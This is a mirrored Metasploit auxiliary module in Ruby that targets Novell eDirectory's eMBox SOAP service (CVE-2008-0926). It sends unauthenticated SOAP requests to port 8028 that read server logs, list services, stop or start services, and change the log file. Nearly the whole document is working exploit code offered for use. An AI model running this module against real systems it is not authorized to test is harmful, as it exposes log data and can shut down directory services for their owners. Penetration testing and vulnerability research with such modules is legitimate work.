Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

edirectory_edirutil.rb 5.0KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. class MetasploitModule < Msf::Auxiliary
  6. include Msf::Exploit::Remote::Tcp
  7. include Msf::Exploit::Remote::HttpClient
  8. def initialize(info = {})
  9. super(update_info(info,
  10. 'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
  11. 'Description' => %q{
  12. This module will access Novell eDirectory's eMBox service and can run the
  13. following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
  14. STOP_SERVICE, START_SERVICE, SET_LOGFILE.
  15. },
  16. 'References' =>
  17. [
  18. [ 'CVE', '2008-0926' ],
  19. [ 'BID', '28441' ],
  20. [ 'OSVDB', '43690' ]
  21. ],
  22. 'Author' =>
  23. [
  24. 'Nicob',
  25. 'MC', #Initial Metasploit module
  26. 'sinn3r'
  27. ],
  28. 'License' => MSF_LICENSE,
  29. 'Actions' =>
  30. [
  31. [
  32. 'GET_DN',
  33. {
  34. 'Description' => 'Get DN',
  35. 'CMD' => 'novell.embox.connmgr.serverinfo',
  36. 'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
  37. 'USE_PARAM' => false
  38. }
  39. ],
  40. [
  41. 'READ_LOGS',
  42. {
  43. 'Description' => 'Read all the log files',
  44. 'CMD' => 'logger.readlog',
  45. 'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
  46. 'USE_PARAM' => false
  47. }
  48. ],
  49. [
  50. 'LIST_SERVICES',
  51. {
  52. 'Description' => 'List services',
  53. 'CMD' => 'novell.embox.service.getServiceList',
  54. 'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
  55. 'USE_PARAM' => false
  56. }
  57. ],
  58. [
  59. 'STOP_SERVICE',
  60. {
  61. 'Description' => 'Stop a service',
  62. 'CMD' => 'novell.embox.service.stopService',
  63. 'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
  64. 'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
  65. '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
  66. '</params></Parameters>',
  67. 'USE_PARAM' => true
  68. }
  69. ],
  70. [
  71. 'START_SERVICE',
  72. {
  73. 'Description' => 'Start a service',
  74. 'CMD' => 'novell.embox.service.startService',
  75. 'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
  76. 'PARAM' => '<Parameters>' +
  77. '<params xmlns:DSService="service.dtd">' +
  78. '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
  79. '</params></Parameters>',
  80. 'USE_PARAM' => true
  81. }
  82. ],
  83. [
  84. 'SET_LOGFILE',
  85. {
  86. 'Description' => 'Read Log File',
  87. 'CMD' => 'logger.setloginfo',
  88. 'PATTERN' => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
  89. 'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>'+
  90. '<logOptionAppend/></params></Parameters>',
  91. 'USE_PARAM' => true
  92. }
  93. ]
  94. ],
  95. 'DefaultAction' => 'LIST_SERVICES'
  96. ))
  97. register_options(
  98. [
  99. Opt::RPORT(8028),
  100. OptString.new("PARAM", [false, 'Specify a parameter for the action'])
  101. ])
  102. end
  103. def run
  104. if action.opts['USE_PARAM']
  105. if datastore['PARAM'].nil? or datastore['PARAM'].empty?
  106. print_error("You must supply a parameter for action: #{action.name}")
  107. return
  108. else
  109. param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
  110. end
  111. else
  112. param = '<Parameters><params/></Parameters>'
  113. end
  114. template = %Q|<?xml version="1.0"?>
  115. <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  116. <SOAP-ENV:Header/>
  117. <SOAP-ENV:Body>
  118. <dispatch>
  119. <Action>#{action.opts['CMD']}</Action>
  120. <Object/>#{param}</dispatch>
  121. </SOAP-ENV:Body>
  122. </SOAP-ENV:Envelope>|
  123. template = template.gsub(/^ {4}/, '')
  124. template = template.gsub(/\n/, '')
  125. connect
  126. print_status("Sending command: #{action.name}...")
  127. res = send_request_cgi({
  128. 'method' => 'POST',
  129. 'uri' => '/SOAP',
  130. 'data' => template + "\n\n",
  131. 'headers' =>
  132. {
  133. 'Content-Type' => 'text/xml',
  134. 'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
  135. }
  136. }, 25)
  137. if res.nil?
  138. print_error("Did not get a response from server")
  139. return
  140. end
  141. raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
  142. print_line("\n" + Rex::Text.decode_base64(raw_data))
  143. disconnect
  144. end
  145. end